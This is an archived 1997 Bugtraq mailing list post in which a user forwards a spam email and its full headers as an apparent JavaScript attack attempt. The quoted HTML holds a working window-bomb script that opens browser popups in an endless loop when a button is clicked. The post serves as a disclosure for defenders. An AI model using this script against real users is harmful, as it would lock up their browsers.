Bugtraq mailing list archives
Another one javascript exploit attempt?
From: Andrew.V.Kovalev () JET MSK SU (Andrew V. Kovalev)
Date: Mon, 7 Apr 1997 13:55:00 +0400
Here is what I got from my mailbox today.. I use elm so I wasn't harmed but it seems that someone is attempting to launch an attack. To prevent damage I changed keyword "Javascript" to "ScriptoJav".. =====Cut here=====
From jet.msk.su!demos!kremvax.demos.su!hotmail.com!SuperSpammer Mon Apr 7 13:17:24 1997
Received: from jet.msk.su by jet.msk.su ; Mon, 7 Apr 97 13:17 MSD
Received: from demos by jet.msk.su ; Mon, 7 Apr 97 13:17 MSD
Received: by kremvax.demos.su (uumail v3.2.4/D) for avk () jet msk su;
Sun, 6 Apr 1997 21:40:05 +0400
Received: by kremvax.demos.su (8.6.13/D) from mindlink.net [204.174.16.1]
for <avk () jet msk su> with ESMTP id UAA26981; Sun, 6 Apr 1997 20:40:01 +0300
From: SuperSpammer () hotmail com
Received: from tr74.mka.net [206.173.17.154] with smtp
by rsoft.rsoft.bc.ca with smtp
(Smail-3.2 1996-Jul-4 #1 #1) id m0wDv4j-001mqrC; Sun, 6 Apr 1997 09:45:53 -0700 (PDT)
Message-Id: <m0wDv4j-001mqrC () rsoft rsoft bc ca>
Date: Sun, 6 Apr 1997 09:45:53 -0700 (PDT)
To: avk () jet msk su
Subject: I'm not a spammer!
Content-Type: text/html; charset=koi8-r
Content-Length: 1239
Status: RO
<HTML>
<HEAD>
</HEAD>
<BODY TEXT="#FF0000" BGCOLOR="#000000" LINK="#0000EE" VLINK="#551A8B" ALINK="#FF0000">
<BASE HREF="http://www.idsoftware.com/";>
<SCRIPT language="JavaScript"><!--
if(navigator.userAgent.indexOf("MSIE") != -1)
document.writeln ('<bgsound src="beast.wav">');else
document.writeln ('<embed src="beast.wav" autostart=true hidden=true>');
function Oops()
{
var Counter = 0
while (true)
{
window.open("http://www.netscape.com","Haha"; + Counter,"width=22,height=22,resizable=no")
Counter++
}
}// --></SCRIPT>
</P>
<FORM method=post name="FormAction" action="mailto:"+"s-spammer () hotmail com"></P>
<CENTER><TABLE BORDER=1 WIDTH="100%" HEIGHT="2000" BGCOLOR="#000000" >
<TR>
<TD>
<CENTER><P>ñ ×ÁÍ ÎÅ ÓÐÁÍÍÅÒ...</P></CENTER>
</TD>
</TR>
<TR>
<TD>
<CENTER><P><FONT SIZE=+1>ñ ×ÁÍ ÎÅ ÓÐÁÍÍÅÒ...</FONT></P></CENTER>
</TD>
</TR>
<TR>
<TD>
<CENTER><P><FONT SIZE=+3>ñ ÷áí îå óðáííåò !</FONT></P></CENTER>
</TD>
</TR>
<TR>
<TD>
<CENTER><P><B><FONT SIZE=+4>ñ -</FONT></B></P></CENTER>
<CENTER><P><B><FONT SIZE=+4>óõðåòóðáííåò !</FONT></B></P></CENTER>
</TD>
</TR>
</TABLE>
<INPUT TYPE="button" value="Have a nice day :)" onClick="Oops()"></P>
</CENTER>
</BODY>
</HTML>
--
Current thread:
- Password problem in Trumpet Winsock. null (Apr 06)
- Linux - buffer overflow in filter Mikhail Iakovlev (Apr 06)
- Re: Password problem in Trumpet Winsock. John Sheehy (Apr 06)
- Re: Password problem in Trumpet Winsock. Michael Douglass (Apr 07)
- Netware + Win95 issue Lauri Laupmaa (Apr 07)
- Re: Netware + Win95 issue Paul Melson (Apr 08)
- Another one javascript exploit attempt? Andrew V. Kovalev (Apr 07)
- DUMP of NT system crash Vytautas Vysniauskas (Apr 07)
- Re: Password problem in Trumpet Winsock. Paul Melson (Apr 07)
- BoS: /etc/default/login LOCKOUT= creates arbitrary files (fwd) Illuminati Primus (Apr 07)
- Re: BoS: /etc/default/login LOCKOUT= creates arbitrary files (f Eugene Bradley (Apr 08)
- FreeBSD Security Advisory: FreeBSD-SA-97:03.sysinstall Aleph One (Apr 07)
- CERT Advisory CA-97.09 - Vulnerability in IMAP and POP Aleph One (Apr 07)
- [linux-security] amd 920824upl102 ignores the nodev option Aleph One (Apr 08)